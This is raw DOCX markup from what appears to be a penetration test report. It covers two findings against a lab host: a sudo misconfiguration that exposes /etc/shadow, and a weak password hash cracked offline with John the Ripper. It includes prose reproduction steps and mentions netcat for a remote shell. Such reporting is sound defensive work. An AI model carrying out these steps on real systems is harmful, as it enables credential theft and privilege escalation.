                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>-</w:t>
              </w:r>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve"> Redirected to Google</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF3469" w:rsidRPr="00D77DFE" w14:paraId="5B0FC7E8" w14:textId="77777777" w:rsidTr="00CD5DDB">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4D64486" w14:textId="77777777" w:rsidR="00AF3469" w:rsidRPr="00D77DFE" w:rsidRDefault="00AF3469" w:rsidP="00AF346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AF3469" w:rsidRPr="00D77DFE" w14:paraId="2D987F7C" w14:textId="77777777" w:rsidTr="00CD5DDB">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774F99C" w14:textId="77777777" w:rsidR="00AF3469" w:rsidRPr="00D77DFE" w:rsidRDefault="00AF3469" w:rsidP="00AF3469">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId47" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://portswigger.net/web-security/cross-site-scripting</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="230735D3" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CA564B5" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>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1E4866" w:rsidRPr="00D77DFE" w14:paraId="60CB33A6" w14:textId="77777777" w:rsidTr="007B6EB7">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19D762C" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00CD5DDB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Sudo Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E4866" w:rsidRPr="00D77DFE" w14:paraId="6755D68E" w14:textId="77777777" w:rsidTr="007B6EB7">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E8953F3"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56679A8"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1E4866" w:rsidRPr="00D77DFE" w14:paraId="29FA59FB"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314EC16" w14:textId="349ACD9C" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E486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VUL_13</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4B1F46A"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67808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5D7AF71A" wp14:editId="30F91ECC">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>1006475</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>53975</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1189531644"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B011E6" id="Rectangle: Rounded Corners 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:79.25pt;margin-top:4.25pt;width:125.8pt;height:10.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" fillcolor="yellow" strokecolor="yellow">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E4866" w:rsidRPr="00D77DFE" w14:paraId="405B041B" w14:textId="77777777" w:rsidTr="001E4866">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45AB300"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5.3</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691BF0C" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866"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1E4866" w:rsidRPr="00D77DFE" w14:paraId="4FE7F3E2" w14:textId="77777777" w:rsidTr="007B6EB7">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EB943FD" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E486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S:U</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MPR:L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4724C5B" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-269: Improper Privilege Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="332B9179"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084011E" w14:textId="72C16B99" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="1F45A9FF"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13A93D1" w14:textId="216D2216" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A"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Sudo, LinPEAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="432B8A68" w14:textId="77777777" w:rsidTr="007B6EB7">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682CE27" w14:textId="6F04AA7C" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="1E6A8238" w14:textId="77777777" w:rsidTr="00760AE4">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5C76B42" w14:textId="44118413" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00AF346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The user redlowo was improperly granted passwordless sudo access to a script that reveals portions of the /etc/shadow file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="7FF4F202"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3787A34" w14:textId="56CE084C" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="207F3449" w14:textId="77777777" w:rsidTr="00760AE4">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AF12758" w14:textId="1167D11D" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="003D1153">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0.2.178</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="12F5DC06"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58824BA" w14:textId="4C93E166" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="450167F7"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9A04845" w14:textId="067C555A" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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This issue allows attackers to extract user password hashes, potentially escalate to root, crack credentials offline, and move laterally if reused across the network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="6680E01E"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F5E0F61" w14:textId="233FBF94" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="52FC9775"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E32192D" w14:textId="461809E0" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>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Review and tighten sudoers settings, restrict scripts accessing sensitive files, and ensure sudo-executed scripts do not expose credentials or system hashes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="7BACD2E4"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367441D" w14:textId="4EE039A6" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="5192A9F8" w14:textId="77777777" w:rsidTr="00760AE4">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B0E6056" w14:textId="4F6ACA50" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="003D1153">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Cs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Log in as redlowo, verify with sudo -l that passwordless execution of view_last_shadow_lines.sh is allowed, run the script, and observe that it exposes the last lines of /etc/shadow, including stocznia’s password hash.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D1153" w:rsidRPr="00D77DFE" w14:paraId="0758C3D4"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F179916" w14:textId="77777777" w:rsidR="003D1153" w:rsidRPr="00D77DFE" w:rsidRDefault="003D1153" w:rsidP="003D1153">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3D1153" w:rsidRPr="00D77DFE" w14:paraId="5B5B21FE"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35D3F87" w14:textId="6BE26098" w:rsidR="003D1153" w:rsidRPr="00D77DFE" w:rsidRDefault="009E4D57" w:rsidP="00DB00A5">
            <w:pPr>
              <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Proof of Concept evidence is provided in Appendix A, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureAI13" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Figure A.</w:t>
              </w:r>
              <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>13 Sudo Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w14:paraId="2B785DBE" w14:textId="77777777" w:rsidTr="007B6EB7">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233E22B" w14:textId="42F92D2E" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00B03D9A">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B03D9A" w:rsidRPr="00D77DFE" w14:paraId="34BAE3ED" w14:textId="77777777" w:rsidTr="00760AE4">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6F01DFA" w14:textId="21A8E2C0" w:rsidR="00B03D9A" w:rsidRPr="00D77DFE" w:rsidRDefault="00B03D9A" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId48" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>http://cwe.mitre.org/data/definitions/269.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00431D09" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://owasp.org/Top10/A05_2021-Security_Misconfiguration/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BED61C0" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00C420B0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1575"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C871E9E" w14:textId="77777777" w:rsidR="00431D09" w:rsidRPr="00D77DFE" w:rsidRDefault="00431D09" w:rsidP="00C420B0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1575"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9439" w:type="dxa"/>
        <w:tblInd w:w="-54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1E4866" w:rsidRPr="00D77DFE" w14:paraId="10514B95" w14:textId="77777777" w:rsidTr="00CD5DDB">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862C5F6" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00CD5DDB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Weak Password Hash: Offline Cracking Enabled Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E4866" w:rsidRPr="00D77DFE" w14:paraId="3C4625C3" w14:textId="77777777" w:rsidTr="00CD5DDB">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9CD451C"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2E0FC90"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1E4866" w:rsidRPr="00D77DFE" w14:paraId="1EE35644"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A2370A5" w14:textId="1EC6E0A2" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E486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VUL_14</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CA55CBB" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866"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69856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="288C0950" wp14:editId="08D6FE59">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>1127420</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>56190</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="12065" t="6985" r="9525" b="8255"/>
                      <wp:wrapNone/>
                      <wp:docPr id="348805153"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8471FF0" id="Rectangle: Rounded Corners 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:88.75pt;margin-top:4.4pt;width:125.8pt;height:10.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" fillcolor="yellow" strokecolor="yellow">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mediun</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E4866" w:rsidRPr="00D77DFE" w14:paraId="7C04ACBE" w14:textId="77777777" w:rsidTr="00CD5DDB">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2712A93" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:after="0"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5.3</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A7B01E7" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:after="0"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1E4866" w:rsidRPr="00D77DFE" w14:paraId="1B33A71D" w14:textId="77777777" w:rsidTr="00CD5DDB">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A63ED35" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E486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S:U</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MPR:L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68FF194" w14:textId="77777777" w:rsidR="001E4866" w:rsidRPr="00D77DFE" w:rsidRDefault="001E4866" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-916: Use of Password Hash With Insufficient Computational Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w14:paraId="129FD492"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79ED00A" w14:textId="241515AA" w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w:rsidRDefault="00D3453D" w:rsidP="00D3453D">
            <w:pPr>
              <w:spacing w:after="0"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D3453D" w:rsidRPr="00D77DFE" w14:paraId="720B7F23"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6FC8F20" w14:textId="157AD39E" w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w:rsidRDefault="00D3453D" w:rsidP="003640F7">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John the ripper, netcat for remote shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w14:paraId="3626E189" w14:textId="77777777" w:rsidTr="00CD5DDB">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442EA65" w14:textId="1A3772F8" w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w:rsidRDefault="00D3453D" w:rsidP="00D3453D">
            <w:pPr>
              <w:spacing w:after="0"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D3453D" w:rsidRPr="00D77DFE" w14:paraId="69C05CFF" w14:textId="77777777" w:rsidTr="00CD5DDB">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1D955E0" w14:textId="6C191B41" w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w:rsidRDefault="00D3453D" w:rsidP="003640F7">
            <w:pPr>
              <w:spacing w:after="0"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The cracked hash for user stocznia demonstrates weak password strength or outdated hashing, allowing offline brute‑force attacks to succeed against the account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w14:paraId="566D4000"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98535CA" w14:textId="6945F24E" w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w:rsidRDefault="00D3453D" w:rsidP="00D3453D">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D3453D" w:rsidRPr="00D77DFE" w14:paraId="1FCCF5E6" w14:textId="77777777" w:rsidTr="00CD5DDB">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B2B1B8E" w14:textId="03DA5044" w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w:rsidRDefault="00D3453D" w:rsidP="003640F7">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.0.2.178</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w14:paraId="0ACD0B92"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A48ED86" w14:textId="6475C090" w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w:rsidRDefault="00D3453D" w:rsidP="00D3453D">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D3453D" w:rsidRPr="00D77DFE" w14:paraId="446F0D33"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A5AB218" w14:textId="735A2621" w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w:rsidRDefault="00D3453D" w:rsidP="003640F7">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This exposure enables unauthorized access to privileged accounts, full host compromise with lateral movement, and long‑term attacker persistence and escalation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w14:paraId="6D833307"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DBAACC8" w14:textId="62B9ECED" w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w:rsidRDefault="00D3453D" w:rsidP="00D3453D">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D3453D" w:rsidRPr="00D77DFE" w14:paraId="344AE2C2"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A15E04D" w14:textId="79A24EE7" w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w:rsidRDefault="00D3453D" w:rsidP="003640F7">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Enforce strong password standards, require regular rotations for privileged accounts, and immediately reset any compromised credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w14:paraId="17F6CE8E"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BEC0133" w14:textId="7558B667" w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w:rsidRDefault="00D3453D" w:rsidP="00D3453D">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D3453D" w:rsidRPr="00D77DFE" w14:paraId="36C428B8"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F721608" w14:textId="3164713B" w:rsidR="00D3453D" w:rsidRPr="00D77DFE" w:rsidRDefault="00D3453D" w:rsidP="003640F7">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Extract the stocznia hash from /etc/shadow, save it to a file, crack it with John the Ripper, and use the recovered password to authenticate as stocznia and escalate privileges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003640F7" w:rsidRPr="00D77DFE" w14:paraId="3B86DD24"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5AB6678" w14:textId="77777777" w:rsidR="003640F7" w:rsidRPr="00D77DFE" w:rsidRDefault="003640F7" w:rsidP="003640F7">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3640F7" w:rsidRPr="00D77DFE" w14:paraId="74F113BC" w14:textId="77777777" w:rsidTr="00CD5DDB">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45C5336" w14:textId="73D70591" w:rsidR="003640F7" w:rsidRPr="00D77DFE" w:rsidRDefault="009E4D57" w:rsidP="00D852C6">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing/>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Proof of Concept evidence is provided in Appendix A</w:t>
            </w:r>
